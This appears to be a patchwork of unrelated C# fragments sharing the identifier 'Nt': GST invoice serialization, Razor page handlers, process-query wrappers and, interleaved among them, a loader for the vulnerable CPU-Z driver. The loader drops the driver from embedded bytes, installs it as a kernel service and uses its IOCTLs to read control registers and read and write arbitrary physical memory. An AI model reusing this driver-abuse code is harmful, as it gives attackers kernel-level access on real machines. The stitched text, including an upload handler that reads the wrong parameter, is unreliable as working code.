public static bool CreateService(
ref IntPtr hService,
string ServiceName,
string DisplayName,
string BinPath,
uint DesiredAccess,
uint ServiceType,
uint StartType,
uint ErrorControl)
{
IntPtr hSCManager = Nt.OpenSCManager(0, 0, 0x0002 /*SC_MANAGER_CREATE_SERVICE*/);
if (hSCManager == IntPtr.Zero)
{
return(false);
}
hService = Nt.CreateServiceW(
hSCManager,
ServiceName, DisplayName,
DesiredAccess,
ServiceType, StartType,
ErrorControl, BinPath,
0, 0, 0, 0, 0, 0);
Nt.CloseServiceHandle(hSCManager);
return(hService != IntPtr.Zero);
}
public static bool OpenService(out IntPtr hService, string szServiceName, uint DesiredAccess)
{
IntPtr hSCManager = Nt.OpenSCManager(0, 0, DesiredAccess);
hService = Nt.OpenService(hSCManager, szServiceName, DesiredAccess);
Nt.CloseServiceHandle(hSCManager);
return(hService != IntPtr.Zero);
}
public static List <Cdnr> GetCdnrGst1Save(DataTable dtInvoice, DataTable dtInvoiceItemRate)
{
#region Cdnr Section
List <Cdnr> _resCdnrList = new List <Cdnr>();
List <Nt> _resCdnrInv = new List <Nt>();
List <Itm3> _resCdnrItm = new List <Itm3>();
#endregion
List <Cdnr> _cdnrList = new List <Cdnr>();
var distinctctin = (from DataRow dRow in dtInvoice.Rows
select new { col1 = dRow["ctin"] }).Distinct().ToList();
for (int k = 0; k < distinctctin.Count(); k++)
{
Cdnr _cdnr = new Cdnr();
_cdnr.ctin = distinctctin[k].ToString().Replace("col1 =", "").Replace("{", "").Replace("}", "");
string _selectParam = "ctin =" + "'" + _cdnr.ctin.TrimStart().TrimEnd() + "'";
var currInvoiceLoop = dtInvoice.Select(_selectParam).CopyToDataTable();
List <ItmDet3> _itmdetList = new List <ItmDet3>();
string JSONString = string.Empty;
JSONString = JsonConvert.SerializeObject(currInvoiceLoop);
_resCdnrInv = Newtonsoft.Json.JsonConvert.DeserializeObject <List <Nt> >(JSONString);
string JSONStringItem = string.Empty;
JSONStringItem = JsonConvert.SerializeObject(dtInvoiceItemRate);
_itmdetList = Newtonsoft.Json.JsonConvert.DeserializeObject <List <ItmDet3> >(JSONStringItem);
_cdnr.nt = _resCdnrInv;
List <Inv> _invList = new List <Inv>();
for (int i = 0; i < currInvoiceLoop.Rows.Count; i++)
{
Nt _inv = new Nt();
List <ItmDet3> itmdetList = new List <ItmDet3>();
List <Itm3> _itmList = new List <Itm3>();
string invoiceId = _cdnr.nt[i].InvoiceId;
var _curritm = (List <ItmDet3>)_itmdetList.Where(x => x.InvoiceId == invoiceId).Select(x => x).ToList();
_inv = _resCdnrInv[i];
for (int j = 0; j < _curritm.Count(); j++)
{
Itm3 _itm = new Itm3();
ItmDet3 _itmdet = new ItmDet3();
_itmdet = (_curritm[j]);
_itm.num = i + 1;
_itm.itm_det = _itmdet;
_itmList.Add(_itm);
_inv.itms = _itmList;
_cdnr.nt[i] = _inv;
}
}
_cdnrList.Add(_cdnr);
}
return(_cdnrList);
}
/// <summary>
/// Read a kernel control register
/// </summary>
/// <returns>Value of control register</returns>
public ulong ReadControlRegister(uint controlRegister)
{
ulong value = 0;
UInt32 io = 0;
if (!Nt.DeviceIoControl(g_DeviceHandle, IOCTL_ReadControlRegister, &controlRegister, sizeof(uint), &value, sizeof(ulong), &io, 0))
{
throw new Exception("DeviceIonControl failed! - 0x9C402428");
}
return(value);
}
public Nt GetNt(GST_TRN_CRDR_NOTE_DATA ntInvoice)
{
Nt ntdata = new Nt();
ntdata.itms = new List <Itm5>();
ntdata.nt_dt = Convert.ToString(ntInvoice.GST_TRN_CRDR_NOTE.GST_TRN_INVOICE.InvoiceDate);
ntdata.nt_num = ntInvoice.GST_TRN_CRDR_NOTE.GST_TRN_INVOICE.InvoiceNo;
ntdata.ntty = Convert.ToString(ntInvoice.GST_TRN_CRDR_NOTE.NoteType);
ntdata.p_gst = Convert.ToString(ntInvoice.GST_TRN_CRDR_NOTE.P_Gst);
//ntdata.rsn = Convert.ToString(ntInvoice.Issuing_Note);
//ntdata.val = Convert.ToInt32(ntInvoice.GST_TRN_OFFLINE_INVOICE.Voucher_Value);
ntdata.itms.Add(GetItem5(ntInvoice));
return(ntdata);
}
public async Task <IActionResult> OnGetAsync(int?id)
{
if (id == null)
{
return(NotFound());
}
Nt = await _context.Nts.FirstOrDefaultAsync(m => m.Id == id);
if (Nt == null)
{
return(NotFound());
}
return(Page());
}
public async Task <IActionResult> OnPostAsync(int?id)
{
if (id == null)
{
return(NotFound());
}
Nt = await _context.Nts.FindAsync(id);
if (Nt != null)
{
_context.Nts.Remove(Nt);
await _context.SaveChangesAsync();
}
return(RedirectToPage("./Index"));
}
/// <summary>
/// Read buffer, of specified size, at physical address
/// </summary>
/// <returns>Success</returns>
public bool ReadPhysicalAddress(ulong lpAddress, ulong lpBuffer, ulong lLength)
{
InputReadStruct input = new InputReadStruct();
OutputStruct output = new OutputStruct();
if (lpAddress == 0 || lpBuffer == 0)
{
return(false);
}
input.AddressHigh = (uint)HIDWORD(lpAddress);
input.AddressLow = (uint)LODWORD(lpAddress);
input.Length = (uint)lLength;
input.BufferHigh = (uint)HIDWORD(lpBuffer);
input.BufferLow = (uint)LODWORD(lpBuffer);
UInt32 io = 0;
return(Nt.DeviceIoControl(g_DeviceHandle, IOCTL_ReadPhysicalAddress, &input, (uint)Marshal.SizeOf(typeof(InputReadStruct)), &output, (uint)Marshal.SizeOf(typeof(OutputStruct)), &io, 0));
}
/// <summary>
/// Unload the vulnerable driver (and clean up its mess)
/// </summary>
/// <returns></returns>
public bool Unload()
{
if (!ServiceHelper.StopService(g_ServiceHandle))
{
Console.WriteLine($"[!] Couldn't stop service");
return(false);
}
if (!ServiceHelper.DeleteService(g_ServiceHandle))
{
Console.WriteLine($"[!] Couldn't delete service");
return(false);
}
ServiceHelper.CloseServiceHandle(g_ServiceHandle);
Nt.CloseHandle(g_DeviceHandle);
Console.WriteLine($"[+] Unloaded service");
return(true);
}
/// <summary>
/// etrieves information about the specified process.
/// </summary>
/// <param name="processHandle">A handle to the process to query.</param>
/// <returns>A <see cref="ProcessBasicInformation" /> structure containg process information.</returns>
public static ProcessBasicInformation NtQueryInformationProcess(ASafeMemoryHandle processHandle)
{
// Check if the handle is valid
AHandleManipulator.ValidateAsArgument(processHandle, "processHandle");
// Create a structure to store process info
var info = new ProcessBasicInformation();
// Get the process info
var ret = Nt.NtQueryInformationProcess(processHandle, ProcessInformationClass.ProcessBasicInformation,
ref info, info.Size, IntPtr.Zero);
// If the function succeeded
if (ret == 0)
{
return(info);
}
// Else, couldn't get the process info, throws an exception
throw new ApplicationException($"Couldn't get the information from the process, error code '{ret}'.");
}
/// <summary>
/// Retrieves information about the specified thread.
/// </summary>
/// <param name="threadHandle">A handle to the thread to query.</param>
/// <returns>A <see cref="ThreadBasicInformation" /> structure containg thread information.</returns>
public static ThreadBasicInformation NtQueryInformationThread(SafeMemoryHandle threadHandle)
{
// Check if the handle is valid
HandleManipulator.ValidateAsArgument(threadHandle, "threadHandle");
// Create a structure to store thread info
var info = new ThreadBasicInformation();
// Get the thread info
var ret = Nt.NtQueryInformationThread(threadHandle, 0, ref info, MarshalType <ThreadBasicInformation> .Size,
0);
// If the function succeeded
if (ret == 0)
{
return(info);
}
// Else, couldn't get the thread info, throws an exception
throw new ApplicationException($"Couldn't get the information from the thread, error code '{ret}'.");
}
//public IActionResult UploadOneFile(IFormFile f)
//{
// using (var filestream = new FileStream(Path.Combine(hostingEnvironment.WebRootPath, "imagesUploaded"), FileMode.Create))
// {
// f.CopyTo(filestream);
// }
// return Page();
//}
//public IActionResult UploadManyFile( IEnumerable<IFormFile> fs)
//{
// //int i = 0;
// foreach (var file in fs)
// { using (var filestream = new FileStream(Path.Combine(hostingEnvironment.WebRootPath, "imagesUploaded"), FileMode.Create))
// {
// file.CopyTo(filestream);
// }
// }
// return Page();
//}
// To protect from overposting attacks, please enable the specific properties you want to bind to, for
// more details see https://aka.ms/RazorPagesCRUD.
public IActionResult OnPost(IFormFile Photo2)
{
if (!ModelState.IsValid)
{
return(Page());
}
if (ModelState.IsValid)
{
string uniqueFileName = null;
if (Photo != null)
{
uniqueFileName = Guid.NewGuid().ToString() + "_" + Path.GetFileName(Photo.FileName);
string uploadsFolder = Path.Combine(hostingEnvironment.WebRootPath, "imagesUploaded");
string filePath = Path.Combine(uploadsFolder, uniqueFileName);
var filestream = new FileStream(filePath, FileMode.Create);
Photo.CopyTo(filestream);
}
Nt newNt = new Nt
{
word = bNt.word,
translation = bNt.translation,
wordLng = _uo.fromLang,
transLng = _uo.toLang,
mark = 0,
pics = uniqueFileName
};
_context.Nts.Add(newNt);
_context.SaveChanges();
return(Page());
}
return(RedirectToPage("./Index"));
}
/// <summary>
/// Write buffer, of specified size, at physical address
/// </summary>
/// <returns>Success</returns>
public bool WritePhysicalAddress(ulong address, ulong buf, ulong len)
{
if (len % 4 != 0 || len == 0)
{
throw new Exception("The CPU-Z driver can only write lengths that are aligned to 4 bytes (4, 8, 12, 16, etc)");
}
InputWriteStruct in_mem = new InputWriteStruct();
OutputStruct out_mem = new OutputStruct();
if (address == 0 || buf == 0)
{
return(false);
}
UInt32 io = 0;
if (len == 4)
{
in_mem.AddressHigh = (uint)HIDWORD(address);
in_mem.AddressLow = (uint)LODWORD(address);
in_mem.Value = *(uint *)buf;
return(Nt.DeviceIoControl(g_DeviceHandle, IOCTL_WritePhysicalAddress, &in_mem, (uint)Marshal.SizeOf(typeof(InputWriteStruct)), &out_mem, (uint)Marshal.SizeOf(typeof(OutputStruct)), &io, 0));
}
else
{
for (uint i = 0; i < len / 4; i++)
{
in_mem.AddressHigh = (uint)HIDWORD(address + 4 * i);
in_mem.AddressLow = (uint)LODWORD(address + 4 * i);
in_mem.Value = ((uint *)buf)[i];
if (!Nt.DeviceIoControl(g_DeviceHandle, IOCTL_WritePhysicalAddress, &in_mem, (uint)Marshal.SizeOf(typeof(InputWriteStruct)), &out_mem, (uint)Marshal.SizeOf(typeof(OutputStruct)), &io, 0))
{
return(false);
}
}
return(true);
}
}
public static void CloseServiceHandle(IntPtr hService) => Nt.CloseServiceHandle(hService);
public static bool DeleteService(IntPtr hService) => Nt.DeleteService(hService);
public static bool StartService(IntPtr hService) => Nt.StartService(hService, 0, null);
public static bool StopService(IntPtr hService)
{
Nt.SERVICE_STATUS ServiceStatus = new Nt.SERVICE_STATUS();
return(Nt.ControlService(hService, Nt.SERVICE_CONTROL.STOP, ref ServiceStatus));
}
private void OnCloseMsgBox(object sender, Nt.CloseEventArgs args)
{
wins.Buffer.Text = args.Response.ToString();
}
// DRIVER FUNCTIONS
/// <summary>
/// Load the vulnerable driver
/// </summary>
/// <returns></returns>
public bool Load()
{
IntPtr serviceHandle;
if (ServiceHelper.OpenService(out serviceHandle, DriverDisplayName, 0x0020 /*SERVICE_STOP*/ | 0x00010000 /*DELETE*/))
{
Console.WriteLine($"[!] Service already running");
if (!ServiceHelper.StopService(serviceHandle))
{
Console.WriteLine($"[!] Couldn't stop service");
}
if (!ServiceHelper.DeleteService(serviceHandle))
{
Console.WriteLine($"[!] Couldn't delete service");
}
ServiceHelper.CloseServiceHandle(serviceHandle);
return(Load());
}
File.WriteAllBytes(DriverFileName, CPUZShellcode.Shellcode);
Console.WriteLine($"[+] Loading...");
if (!ServiceHelper.CreateService(
ref g_ServiceHandle,
DriverDisplayName, DriverDisplayName,
DriverFileName,
(uint)Nt.SERVICE_ACCESS.SERVICE_ALL_ACCESS, 1 /*SERVICE_KERNEL_DRIVER*/,
(uint)Nt.SERVICE_START.SERVICE_DEMAND_START, 1 /*SERVICE_ERROR_NORMAL*/))
{
Console.WriteLine($"[!] Failed to create service - {Marshal.GetLastWin32Error():X}");
return(false);
}
if (!ServiceHelper.StartService(g_ServiceHandle))
{
Console.WriteLine($"[!] Failed to start service - {Marshal.GetLastWin32Error():X}");
ServiceHelper.DeleteService(g_ServiceHandle);
return(false);
}
Console.WriteLine($"[+] Getting Device Handle");
Nt.OBJECT_ATTRIBUTES objectAttributes = new Nt.OBJECT_ATTRIBUTES();
Nt.UNICODE_STRING deviceName = new Nt.UNICODE_STRING(DriverDeviceName);
Nt.IO_STATUS_BLOCK ioStatus;
objectAttributes.Length = Marshal.SizeOf(typeof(Nt.OBJECT_ATTRIBUTES));
objectAttributes.ObjectName = new IntPtr(&deviceName);
uint status = 0;
IntPtr deviceHandle;
do
{
status = Nt.NtOpenFile(
&deviceHandle,
(uint)(Nt.ACCESS_MASK.GENERIC_READ | Nt.ACCESS_MASK.GENERIC_WRITE | Nt.ACCESS_MASK.SYNCHRONIZE),
&objectAttributes, &ioStatus, 0, 3 /*OPEN_EXISTING*/);
if (status != 0 /*NT_SUCCESS*/)
{
Console.WriteLine($"[!] NtOpenFile failed! - {status:X}");
Thread.Sleep(250);
}
} while (status != 0 /*NT_SUCCESS*/);
g_DeviceHandle = deviceHandle;
Console.WriteLine($"[+] hService: {g_ServiceHandle:X}");
Console.WriteLine($"[+] hDevice: {g_DeviceHandle:X}");
return(true);
}